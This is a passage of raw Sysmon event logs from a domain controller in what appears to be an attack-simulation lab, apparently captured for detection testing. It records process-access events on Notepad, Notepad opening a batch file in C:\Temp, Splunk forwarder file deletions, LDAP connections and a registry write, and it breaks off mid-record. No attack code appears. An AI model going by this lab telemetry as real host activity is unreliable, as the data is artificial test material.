10341000x80000000000000009075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:19.106{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.106{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:19.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:19.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:19.090{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-64C5-6064-A500-00000000AE01}43565668C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+17d35c|C:\Windows\System32\SHELL32.dll+1981d8|C:\Windows\System32\SHELL32.dll+2845d3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17d600 154100x80000000000000009067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.094{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" 
C:\Temp\1.batC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000009066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=165CE9A120DBC59C7427B9FE076EE4FF,SHA256=552F753F8337AF30EFE817A52FF758077BE45238D53B4BB73E23791A6787EF33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:20.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=326F9476DA53468AC5229BF695BFFD69,SHA256=08E7729A5A8CE833892DCA72DADAD41A9AFA9032D797AED1F43739BFABE3F6CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:21.166{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26FF591FCDE12BBF0F2D2AFA65D202CB,SHA256=8AB6E8BAD51066198BB61B787AF71E3D1931E13283D1607339247FB08595272B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000009092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:22.211{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EF091F5DB3C1CF287882CC9C039150C,SHA256=826A2BD9C1B46B3ACCCA65D6054F05E1E88AC5995FC722B53523B6FCA889D602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:23.226{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11E8D1516AFD4878799DD4508C5266BE,SHA256=D28EA7C3AD76DED67B2F12A8C72F7632CAAF6C96366B26C0E593889FD09EBF5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:24.381{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000009094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:24.256{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA1ABB94E0FECBC1F0873D1D5C04B9E0,SHA256=A45FC852F499A23549F3CC163EAD5F9F1B95B548208E5FB8EF57B024A66FA4DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:25.411{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5005BACAB036B4E1288B87BBA994DBB,SHA256=07F7F68D03C1F753A49B86E8722996F5913A92F0EB8169A225D5FA9767B69167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:25.411{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F7E7FBAB430A5EB636F48829EED7D11,SHA256=1717DBDF54C26D82EA9F4EDBC081C2A3A6DB98B4F322AE64C32340618532CCE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:25.302{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47560F3715E47D5DAA0DE7BBCEFECA90,SHA256=4EBA241AD54FB8F889D781811CA344F8A06AEE185CC0DD5CC5488724CDFE85B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:23.494{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53625-false10.0.1.12-8000- 23542300x80000000000000009102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:26.379{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21959BF734E86BA6512E6159A2122817,SHA256=8010D32C63EA8154E499AE897AB8F96BB6B8789D40C712DAA2C275107A3FD609,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:24.691{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53626-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000009100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:24.691{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53626-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 23542300x80000000000000009103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:27.393{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0AB751619589129FE2F3DD1366892A7,SHA256=06C47D135D1C0C549D8491704C99944BEE3009CBABC4BD41F6D73650EB8D2AA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:28.829{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5005BACAB036B4E1288B87BBA994DBB,SHA256=07F7F68D03C1F753A49B86E8722996F5913A92F0EB8169A225D5FA9767B69167,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000009104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:28.532{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DD5B58BB54995828D7586E780F2D4C6,SHA256=B9949CC1AD2148180C65C92E89EC25E04487CB6EE58B8659FE04CAF6AAAB3351,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:29.578{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3016E5C0CB41CA729D23BA1A4C70C73E,SHA256=872BBCC1C319C0E6D7FB6E6CF4EDB94257008B8A8C9FAD30DCCCC3A54803AAD1,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:29.032{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x0089347d) 23542300x80000000000000009109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:30.593{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=512376E84010A941620471C2C401AB1A,SHA256=66CC35C38E6083715F1EF4085B459222810892F6D03594709A6E1ADC29EE0780,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:29.432{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53627-false10.0.1.12-8000- 10341000x80000000000000009117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.607{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C98EA8BEE9030FC0029D869C26514C85,SHA256=0540F170C9AFE52AF8FE80C1109765C02CEDACAD9C1C9613FDC12DF7F46EB455,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:32.637{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90149EA1BF37787AC905AC77548792D8,SHA256=D5A0055F888DFA1B2D56C758148855435A78E4CA202BDB88ED3DAFC539072B80,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000009119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:33.667{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41C1C7DE5FB40A236C28943454327B6B,SHA256=2F2D37EE9C12C9DF77368D83CCBC54DB64F27BD21AB87894B7D00D43D86E19E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:34.729{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBD8549601D5C3CAFCD64B3DF527349A,SHA256=7541C564CE47851F0B8647055945B18F36F24C111D630116017BCA706AEAC0A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:35.884{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 